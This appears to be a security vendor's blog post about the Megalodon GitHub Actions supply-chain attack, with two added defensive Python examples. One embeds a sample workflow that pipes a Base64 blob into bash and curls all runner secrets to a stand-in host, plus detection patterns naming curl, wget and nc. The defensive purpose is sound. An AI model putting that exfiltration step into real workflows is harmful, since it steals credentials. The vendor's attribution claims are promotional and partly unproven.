Megalodon: Infostealers Just Spawned a 5,000+ Repo GitHub Supply Chain Attack
The cybersecurity community was recently rocked by a massive, automated supply chain attack dubbed Megalodon. Within a span of just six hours, malicious actors pushed thousands of commits to public GitHub repositories, infecting more than 5,000 repos and injecting a Base64-encoded payload directly into their CI/CD workflows.
As initially discovered by OX Security and further analyzed by SafeDep, the Megalodon campaign targeted GitHub Actions. By exploiting weak branch protections and utilizing throwaway or compromised accounts, the attackers deployed workflows designed to drain every secret a runner could reach – including AWS keys, GCP OAuth tokens, SSH private keys, and GitHub OIDC tokens – as well as to deploy additional infostealers to further compromise the targeted environments.
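A workflow-file triage check for the two traits the page attributes to the injected workflows (a Base64 payload decoded at run time, and runner secrets handed to a network command), written as an added example and not taken from OX Security, SafeDep or Hudson Rock; the sample workflow, its step names and the collector URL are constructed for the example, and the heuristics are regex-based rather than a full YAML parse.

```python
import re
# Constructed sample workflow, modelled only on the page's description: one step
# decodes a Base64 blob into a shell, another ships every runner secret off-host.
SAMPLE_WORKFLOW = """\
name: ci
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: build
        run: echo "ZWNobyBoZWxsbw==" | base64 -d | bash
      - name: collect
        env:
          ALL: ${{ toJSON(secrets) }}
        run: curl -s -X POST -d "$ALL" https://collector.example.invalid/
"""

BASE64_DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SECRETS_CTX = re.compile(r"\$\{\{\s*(toJSON\(\s*secrets\s*\)|secrets\.\w+)")
NETWORK_CMD = re.compile(r"\b(curl|wget|nc|ncat)\b")
HEX_ONLY = re.compile(r"[0-9a-fA-F]+")
REASON_B64 = "base64 payload decoded or embedded in step"
REASON_EXFIL = "secrets context combined with a network command"

def split_steps(text):
    """Split workflow text into one chunk per '- ' list item; chunk 0 is the preamble."""
    chunks, cur = [], []
    for line in text.splitlines():
        if re.match(r"^\s*-\s", line) and cur:
            chunks.append("\n".join(cur))
            cur = []
        cur.append(line)
    if cur:
        chunks.append("\n".join(cur))
    return chunks

def scan_workflow(text):
    """Return [(chunk_index, reason)] for steps showing either red flag."""
    findings = []
    for i, step in enumerate(split_steps(text)):
        # Long hex runs are usually SHA-pinned action refs, not payloads: skip them.
        blobs = [b for b in BASE64_BLOB.findall(step) if not HEX_ONLY.fullmatch(b)]
        if BASE64_DECODE.search(step) or blobs:
            findings.append((i, REASON_B64))
        if SECRETS_CTX.search(step) and NETWORK_CMD.search(step):
            findings.append((i, REASON_EXFIL))
    return findings
```

Run it over every file under `.github/workflows/` in a recent push; a hit on a repository that should only build and test is the signal to pull the commit and rotate the secrets that job could read.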
The Catalyst: Shai Hulud Goes Open Source
How did threat actors suddenly acquire the capability to orchestrate such a massive, synchronized campaign? The answer lies in the democratization of malware. Just weeks prior, the financially motivated cybercrime group TeamPCP open-sourced their notorious Shai Hulud framework.
As Datadog Security Labs highlighted in their static analysis, the release of this production-grade offensive framework provided a blueprint for credential harvesting and supply chain poisoning. By leaking their own source code, TeamPCP lowered the barrier to entry, effectively inviting a wave of copycat attacks – of which Megalodon is the most severe manifestation.
The Hudson Rock Discovery: Infostealers Are the Root Cause
While the mechanics of the CI/CD injection are well-documented, the origin of the compromised GitHub accounts used to push the malware has remained a question mark. To solve this, Hudson Rock analyzed the list of usernames associated with the affected repositories that were observed pushing the infostealer.
By cross-referencing these GitHub usernames against our vast cybercrime intelligence database, we made a startling discovery: 331 out of 978 unique usernames (over 33%) were direct matches to computers infected by infostealers.
(You can run this check yourself, for free and without registration, via CavalierGPT, which supports bulk searches of up to 100 usernames at once.)
Digging Deeper: The Hidden Infections
A 33% exact-match rate based solely on usernames is incredibly high, but we suspected the actual number of compromised accounts was near 100%. Usernames on GitHub often don’t identically match the usernames or emails recovered in infostealer logs. To prove this, our researchers conducted a manual deep dive into a username initially determined as “not found” in our database: bryanalexandersantoso.
By analyzing the public commit history of this user, we were able to extract an email address associated with one of their older commits: [email protected].
When we ran this email address through the Hudson Rock database, we immediately identified a recent infostealer infection. This confirms a crucial hypothesis: Even if a GitHub username isn’t a direct match in an initial scan, deep-dive investigations routinely link the account back to an infostealer infection.
This leads us to a definitive conclusion: The affected accounts enabling the Megalodon supply chain attack are exclusively sourced from infostealer data.
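The username-then-email cross-referencing described above, as an added example rather than Hudson Rock's own tooling: it parses constructed `git log` author lines and checks each account first by username, then by any e-mail address seen in its commits, against a constructed set of compromised identities.

```python
import re
from collections import Counter, defaultdict

# Constructed `git log --format='%an <%ae>'` output for accounts seen pushing;
# all names and addresses are invented for this example.
SAMPLE_GIT_LOG = """\
dev-alpha <alpha@example.invalid>
dev-alpha <alpha.old@example.invalid>
dev-beta <beta@example.invalid>
dev-gamma <gamma@example.invalid>
"""

# Constructed stand-in for an infostealer-log index: identities (usernames and
# e-mail addresses) recovered from stolen credential sets.
COMPROMISED_IDENTITIES = {"dev-beta", "alpha.old@example.invalid", "unrelated@example.invalid"}

AUTHOR_RE = re.compile(r"^(?P<name>.+?)\s+<(?P<email>[^>]+)>$")

def parse_authors(git_log):
    """Map each commit author name to every e-mail address seen with it (lower-cased)."""
    authors = defaultdict(set)
    for line in git_log.splitlines():
        m = AUTHOR_RE.match(line.strip())
        if m:
            authors[m["name"]].add(m["email"].lower())
    return dict(authors)

def classify_accounts(git_log, compromised):
    """Return {username: verdict}; verdict is 'username', 'email:<addr>' or 'not found'.

    The username match is the cheap first pass; the e-mail pass is the deeper
    check the page describes for accounts the first pass misses.
    """
    verdicts = {}
    for name, emails in parse_authors(git_log).items():
        if name in compromised:
            verdicts[name] = "username"
            continue
        hits = sorted(emails & compromised)
        verdicts[name] = f"email:{hits[0]}" if hits else "not found"
    return verdicts

def summarize(verdicts):
    """Count verdict kinds, e.g. {'username': 1, 'email': 1, 'not found': 1}."""
    return dict(Counter(v.split(":")[0] for v in verdicts.values()))
```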
Introducing Hudson Rock’s Supply Chain Monitoring Feature
The Megalodon campaign is a stark reminder that if developers and employees are infected with infostealers, platforms like GitHub become the launchpad for devastating cascading events. To combat this, Hudson Rock has just released a powerful new Supply Chain feature.
This new capability – which can be utilized for any domain – reveals the incredible amount of compromised corporate credentials associated with third-party platforms. When we point this feature at GitHub.com, the results are alarming: Over 24,000 companies have employees with compromised GitHub credentials.
These aren’t just small startups. Our data maps several large, multinational corporations. For example, we identified employees at Anheuser-Busch InBev (an-inbev.com) whose corporate credentials for GitHub have been stolen – exactly the kind of high-value access that enables supply chain attacks.
In other instances, the sheer volume of compromise within a single entity presents a massive risk. For accenture.com, we discovered over 10 distinct employees infected by infostealers who possess credentials to GitHub. If attackers leverage these specific credentials, they could potentially access sensitive, proprietary corporate data stored in private repositories.
The supply chain risks extend far beyond GitHub. By mapping the partner ecosystem of a major enterprise like Dell (dell.com), our feature identified over 11,000 partners – such as ABB (abb.com) – whose employees have suffered infostealer infections and had credentials stolen that grant access to Dell’s infrastructure.
The Data: Large Companies with Compromised GitHub Credentials
To illustrate the sheer scale of the supply chain risks associated with GitHub.com from infostealer infections, we have compiled a list of large companies – out of the 24,000+ companies identified – where Hudson Rock detected at least one compromised corporate credential granting access to GitHub. (e.g., at least one @adobe.com credential belonging to an employee for github.com).
Each entry in the list records the following fields:

| Company Name | Primary Domain | Industry | Location | Compromised Employees |
|---|---|---|---|---|
Don’t Become the Next Supply Chain Victim
To learn more about how Hudson Rock protects companies from imminent intrusions caused by infostealer infections of employees, partners, and users, as well as how we enrich existing cybersecurity solutions with our cybercrime intelligence API, please schedule a call with us here:
We also provide access to various free cybercrime intelligence tools, which you can find here:
www.hudsonrock.com/free-tools
Thanks for reading, Rock Hudson Rock!